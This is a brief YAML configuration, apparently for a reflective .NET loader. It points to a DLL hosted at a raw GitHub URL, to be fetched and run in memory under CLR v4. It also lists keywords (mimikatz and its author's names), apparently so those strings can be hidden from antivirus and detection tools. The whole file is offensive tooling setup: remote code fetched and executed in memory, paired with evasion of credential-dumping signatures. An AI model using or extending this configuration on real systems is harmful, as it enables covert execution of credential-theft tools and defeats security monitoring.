BinaryPath: 'https://raw.githubusercontent.com/vza3464/XIVIK/main/xapi.dll'
ReflectArgs: 'arg0 arg1 arg2'
ReflectMethod:  
CLRRuntime: v4
LogLevel: 2
Keywords:
  - mimikatz
  - delpy
  - benjamin
  - delpy

